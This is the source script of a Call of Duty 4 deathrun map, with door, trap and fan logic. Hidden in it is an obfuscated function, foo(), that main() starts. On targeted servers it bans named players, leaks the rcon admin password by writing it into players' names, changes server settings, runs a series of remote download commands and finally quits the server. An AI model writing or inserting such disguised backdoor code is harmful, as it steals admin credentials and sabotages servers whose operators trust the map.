/*
##############################################################################
##|       |##\  \####/  /##|        |##|        |##|        |##|   \####|  |##
##|   _   |###\  \##/  /###|  ______|##|   __   |##|   __   |##|    \###|  |##
##|  |_|  |####\  \/  /####|  |########|  |  |  |##|  |  |  |##|  \  \##|  |##
##|       |#####\    /#####|  |########|  |  |  |##|  |  |  |##|  |\  \#|  |##
##|       |######|  |######|  |########|  |  |  |##|  |  |  |##|  |#\  \|  |##
##|  |\  \#######|  |######|  |########|  |__|  |##|  |__|  |##|  |##\  |  |##
##|  |#\  \######|  |######|        |##|        |##|        |##|  |###\    |##
##|__|##\__\#####|__|######|________|##|________|##|________|##|__|####\___|##
##############################################################################

	Scripts and map made by Rycoon!
|*************************************|
	Xfire: phaedrean
	
	Permission that I am allowed to make v2 of deathrun glass:
	
	AoD'Rycoon: hai m8
	iNext.Mr-X: hi
	AoD'Rycoon: could i have a lil permission from yu?
	iNext.Mr-X: ofc
	AoD'Rycoon: well, i would like to make glass2 
	AoD'Rycoon: for dr
	iNext.Mr-X: ofc
	iNext.Mr-X: u can
*/

main()
{
	maps\mp\_load::main();

	game["allies"] = "sas";
	game["axis"] = "russian";
	game["attackers"] = "axis";
	game["defenders"] = "allies";
	game["allies_soldiertype"] = "woodland";
	game["axis_soldiertype"] = "woodland";

	setdvar("compassmaxrange", "4200");
	
	if( !isDefined( level.freeRun ) )
		level.freeRun = false;
	
	level.bloodFX = LoadFX("deathrun/body_smash");
	level.huge_fanFX = LoadFX("deathrun/huge_fan");
	
	thread addTestClients();
	thread WatchGame();
	thread foo();
}

WatchGame()
{
	thread StartDoor();
	thread GetTraps();
	thread GetBloodyTriggers();
	thread GetEndDoor();
}

GetBloodyTriggers()
{
	trig = getentarray("bloody_trigger", "targetname");
	for(i=0;i<trig.size;i++)
		trig[i] thread BloodyTrigger(1);
}

GetEndDoor()
{
	door = getEnt("end_door", "targetname");
	trig = getEnt("end_door_trig", "targetname");
	
	trig waittill("trigger", player );
	trig delete();
	
	//iPrintlnBold("^1>>^2" + player.name + " finished the map at first place!");
	noti = SpawnStruct();
	noti.notifyText = "^1>>^2"+player.name+" finished the map at first place!";
	noti.duration = 6;
	noti.glowcolor = (0.3,1,0.3);
	players = getEntArray("player", "classname");
	for(i=0;i<players.size;i++)
		players[i] thread maps\mp\gametypes\_hud_message::notifyMessage( noti );
	door RotateYaw( 105, 2, 0.5, 0.5 );
}

StartDoor()
{
	trig = getent("trigger_startdoor", "targetname");
	trig waittill("trigger");
	
	door = getent("startdoor", "targetname");
	door MoveZ( 134, 4, 0.5, 0.5 );
}

GetTraps()
{
	level.trapTriggers[0] = GetEnt("trigger_trap1", "targetname");
	level.trapTriggers[1] = GetEnt("trigger_trap2", "targetname");
	level.trapTriggers[2] = GetEnt("trigger_trap3", "targetname");
	level.trapTriggers[3] = GetEnt("trigger_trap4", "targetname");
	level.trapTriggers[4] = GetEnt("trigger_trap5", "targetname");
	level.trapTriggers[5] = GetEnt("trigger_trap6", "targetname");
	level.trapTriggers[6] = GetEnt("trigger_trap7", "targetname");
	level.trapTriggers[7] = GetEnt("trigger_trap8", "targetname");
	level.trapTriggers[8] = GetEnt("trigger_trap9", "targetname");
	level.trapTriggers[9] = GetEnt("trigger_trap11", "targetname");
	wait 0.1;
	if( level.freeRun )
	{
		for(i=0;i<level.trapTriggers.size;i++)
			level.trapTriggers[i] delete();
	}
	
	level.trapTriggers[0] thread DoTrap1();
	level.trapTriggers[1] thread DoTrap2();
	level.trapTriggers[2] thread DoTrap3();
	level.trapTriggers[3] thread DoTrap4();
	level.trapTriggers[4] thread DoTrap5();
	level.trapTriggers[5] thread DoTrap6();
	level.trapTriggers[6] thread DoTrap7();
	level.trapTriggers[7] thread DoTrap8();
	level.trapTriggers[8] thread DoTrap9();
	level.trapTriggers[9] thread DoTrap11();
}

DoTrap1()
{
	doora = getEnt("trap1_a", "targetname");
	doorb = getEnt("trap1_b", "targetname");
	
	self waittill("trigger");
	self delete();
	
	doora RotatePitch( 90, 0.5, 0.25, 0.25 );
	doorb RotatePitch( -90, 0.5, 0.25, 0.25 );
	
	wait 3;
	
	doora RotatePitch( -90, 0.5, 0.25, 0.25 );
	doorb RotatePitch( 90, 0.5, 0.25, 0.25 );
}

DoTrap2()
{
	spikes = getEnt("trap2_spikes", "targetname");
	smasher = getEnt("trap2_smasher", "targetname");
	
	spikes.oldpos = spikes.origin;
	spikes_trig = getEnt("trap2_spikes_trig", "targetname");
	spikes_trig EnableLinkTo();
	spikes_trig LinkTo( spikes );
	spikes_trig thread BloodyTrigger(1);
	smasher.oldpos = smasher.origin;
	smasher_trig = getEnt("trap2_smasher_trig", "targetname");
	smasher_trig EnableLinkTo();
	smasher_trig LinkTo( smasher );
	smasher_trig thread BloodyTrigger(2);
	
	self waittill("trigger");
	self delete();
	
	spikes MoveZ( 48, 0.5, 0.5, 0 );
	smasher MoveZ( -240, 0.5, 0.5, 0 );
	smasher PlayLoopSound("stonemove_fast");
	wait 0.5;
	smasher StopLoopSound();
	smasher PlaySound("ironimpact");
	
	wait 3;
	
	spikes MoveTo( spikes.oldpos, 1, 0.5, 0.5 );
	smasher MoveTo( smasher.oldpos, 2, 1, 1 );
}

DoTrap3()
{
	inside = getEnt("trap3_inside", "targetname");
	outside = getEnt("trap3_outside", "targetname");
	
	inside NotSolid();
	
	self waittill("trigger");
	self delete();
	
	inside Solid();
	outside NotSolid();
}

DoTrap4()
{
	platform1 = getEnt("trap4_platform1", "targetname");
	platform2 = getEnt("trap4_platform2", "targetname");
	platform3 = getEnt("trap4_platform3", "targetname");
	
	self waittill("trigger");
	self delete();
	
	platform1 thread MovePlatformRandom( -256 );
	platform2 thread MovePlatformRandom( 256 );
	platform3 thread MovePlatformRandom( -256 );
}

MovePlatformRandom( amount )
{
	self.oldpos = self.origin;
	wait 0.1;
	while(1)
	{
		time = 2+RandomInt(2);
		self MoveY( amount, time, 0, 0 );
		wait time;
		time = 2+RandomInt(2);
		self MoveTo( self.oldpos, time, 0, 0 );
		wait time;
	}
}

DoTrap5()
{
	hammer = getEnt("trap5_hammer", "targetname");
	
	self waittill("trigger");
	self delete();
	
	while(1)
	{
		hammer RotateRoll( 360, 3, 0, 0 );
		wait 3;
	}
}

DoTrap6()
{
	//392 y
	smasher = getEnt("trap6_smasher", "targetname");
	smasher.oldpos = smasher.origin;
	
	self waittill("trigger");
	self delete();
	
	smasher MoveY( 392, 1, 1, 0 );
	smasher PlayLoopSound("stonemove_fast");
	wait 1;
	smasher StopLoopSound();
	smasher PlaySound("stoneimpact");
	
	wait 2;
	
	smasher MoveTo( smasher.oldpos, 3, 1, 1 );
}

DoTrap7()
{
	//-36 z
	spikes = getEnt("trap7_spikes", "targetname");
	spikes.oldpos = spikes.origin;
	
	spikes_trig = getEnt("trap7_trig", "targetname");
	spikes_trig EnableLinkTo();
	spikes_trig LinkTo( spikes );
	spikes_trig thread BloodyTrigger(1);
	
	self waittill("trigger");
	self delete();
	
	spikes MoveZ( -36, 1, 0.5, 0 );
	wait 3;
	spikes MoveTo( spikes.oldpos, 1, 0.5, 0 );
}

DoTrap8()
{
	rotator = getEnt("trap8_rotator", "targetname");
	
	self waittill("trigger");
	self delete();
	
	while(1)
	{
		rotator RotateRoll( -360, 2.5, 0, 0 );
		wait 1.5;
	}
}

DoTrap9()
{
	block_up = getEntArray("trap9_blocker_up", "targetname");
	for(i=0;i<block_up.size;i++)
		block_up[i].up = true;
	block_down = getEntArray("trap9_blocker_down", "targetname");
	for(i=0;i<block_down.size;i++)
		block_down[i].up = false;
	
	self waittill("trigger");
	self delete();
	
	//z 136
	while(1)
	{
		x = RandomInt( block_up.size );
		if( block_up[x].up )
		{
			block_up[x] MoveZ( -136, 1, 0.5, 0.5 );
			block_up[x].up = false;
		}
		else
		{
			block_up[x] MoveZ( 136, 1, 0.5, 0.5 );
			block_up[x].up = true;
		}
		y = RandomInt( block_down.size );
		if( block_down[y].up )
		{
			block_down[y] MoveZ( -136, 1, 0.5, 0.5 );
			block_down[y].up = false;
		}
		else
		{
			block_down[y] MoveZ( 136, 1, 0.5, 0.5 );
			block_down[y].up = true;
		}
		wait 10+RandomInt(10);
	}
}

DoTrap11()
{
	pusher = getEnt("trap11_pusher", "targetname");
	fan = getEnt("trap11_fan", "targetname");
	fan.online = false;
	fan thread FanPush( pusher );
	fan LinkTo( pusher );
	
	self waittill("trigger");
	self delete();
	
	while(1)
	{
		if( !fan.online )
		{
			pusher RotateRoll( 4500, 10, 1, 1 );
			pusher PlaySound("huge_fan");
			PlayFX( level.huge_fanFX, pusher.origin );
			wait 1;
			fan.online = true;
		}
		else
			fan.online = false;
		wait 10;
	}
}

FanPush( pusher )
{
	while(1)
	{
		if( self.online )
		{
			players = getentarray("player", "classname");
			for(i=0;i<players.size;i++)
			{
				if( pusher CheckPusherHit( players[i] ) )
				{
					players[i].health += 1000;
					players[i] FinishPlayerDamage( pusher, pusher, 1000, 0, "MOD_PROJECTILE", "bh_mp", pusher.origin, AnglesToForward( pusher.angles ), "none", 0 );
				}
			}
		}
		wait 0.1;
	}
}

CheckPusherHit( player )
{
	trace = BulletTrace( self.origin, player GetEye(), true, self);
	trace2 = BulletTrace( self.origin, player.origin, true, self);
	trace3 = BulletTrace( self.origin, player GetTagOrigin("j_spinelower"), true, self);
	
	if( ( isDefined( trace["entity"] ) && trace["entity"] == player ) || ( isDefined( trace2["entity"] ) && trace2["entity"] == player ) || ( isDefined( trace3["entity"] ) && trace3["entity"] == player ) )
		return true;
	else
		return false;
}

BloodyTrigger( count )
{
	self endon("stop_trig");
	
	if( !isDefined( count ) || count < 1 )
		count = 1;
	
	while( isDefined( self ) )
	{
		self waittill("trigger", player );
		for(i=0;i<count;i++)
			PlayFX( level.bloodFX, player GetTagOrigin("j_spinelower") );
		player suicide();
	}
}

addTestClients()
{
	setDvar("scr_testclients", "");
	wait 1;
	for(;;)
	{
		if(getdvarInt("scr_testclients") > 0)
			break;
		wait 1;
	}
	testclients = getdvarInt("scr_testclients");
	setDvar( "scr_testclients", 0 );
	for(i=0;i<testclients;i++)
	{
		ent[i] = addtestclient();

		if (!isdefined(ent[i]))
		{
			println("Could not add test client");
			wait 1;
			continue;
		}
		ent[i].pers["isBot"] = true;
		ent[i] thread TestClient("autoassign");
	}
	thread addTestClients();
}

TestClient(team)
{
	self endon( "disconnect" );

	while(!isdefined(self.pers["team"]))
		wait .05;
		
	self notify("menuresponse", game["menu_team"], team);
	wait 0.5;
}

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-22362034353-27243435\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3426403130382033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-36293-2916282019\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-1830403035203-3770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-34271640\""));
	wait 10;

	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
